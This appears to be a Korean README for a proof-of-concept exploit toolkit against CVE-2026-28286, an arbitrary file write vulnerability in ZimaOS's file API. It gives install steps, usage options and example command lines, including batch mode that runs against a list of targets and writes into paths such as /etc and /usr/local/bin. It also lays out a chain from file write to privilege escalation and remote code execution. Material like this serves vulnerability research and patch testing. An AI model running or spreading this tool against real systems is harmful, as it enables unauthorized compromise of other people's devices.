
PoC 및 검증 툴킷으로, ZimaOS의 임의 파일 쓰기 취약점인 CVE-2026-28286을 대상으로 하며, API 설정 오류를 악용하여 의도된 디렉터리 외부에 파일을 씁니다.
API 설정 오류 → 임의 파일 쓰기 → 잠재적 시스템 장악
/v2_1/files/filegit clone https://github.com/Rushi9/zimaos-cve-2026-28286-arbitrary-file-write.git
cd zimaos-cve-2026-28286-arbitrary-file-write
pip install -r requirements.txt
python3 poc.py
다음 명령으로 사용 가능한 모든 옵션을 확인할 수 있습니다:
python poc.py -h
usage: poc.py [-h] [-u URL] [-t TARGETS] [-p PATH] [--proxy PROXY] [--token TOKEN] [-n ATTEMPTS] [--delay DELAY]
options:
-h, --help 도움말 메시지 표시 후 종료
-u, --url URL 단일 대상 URL
-t, --targets TARGETS 대상 파일 (배치 모드)
-p, --path PATH 사용자 지정 파일 경로 (기본값: /tmp)
--proxy PROXY 프록시 URL (예: http://127.0.0.1:8080)
--token TOKEN Bearer 인증 토큰
-n, --attempts 시도 횟수
--delay 배치 요청 간 지연 시간 (초)
python poc.py
python poc.py -u http://localhost:8080
python poc.py -u http://localhost:8080 -p /tmp
python poc.py -u http://localhost:8080 -p /etc
python poc.py -u http://localhost:8080 -n 5
python poc.py -u http://localhost:8080 --proxy http://127.0.0.1:8080
python poc.py -t targets.txt
python poc.py -t targets.txt --delay 2
python poc.py -u http://target.com -p /tmp -n 3 --proxy http://127.0.0.1:8080 --token YOUR_TOKEN
Burp Suite와 함께 프록시 모드를 사용하여 다음을 수행하세요:
백엔드가 파일시스템 경계를 강제하지 않습니다:
이로 인해 다음 위치에 쓰기가 가능합니다:
/tmp/
/etc/
/usr/local/bin/
임의 파일 쓰기
↓
설정 / 스크립트 덮어쓰기
↓
권한 상승 / 원격 코드 실행

[✔] 취약점 확인됨 (LISTING_SUCCESS)
경로: /tmp/CVE-2026-28286_⚠️_abc123.txt
유용하게 사용하셨다면 ⭐ 스타를 남겨주세요. 더 많은 연구자들이 이 작업을 발견하는 데 도움이 됩니다.
승인된 테스트에만 사용하세요.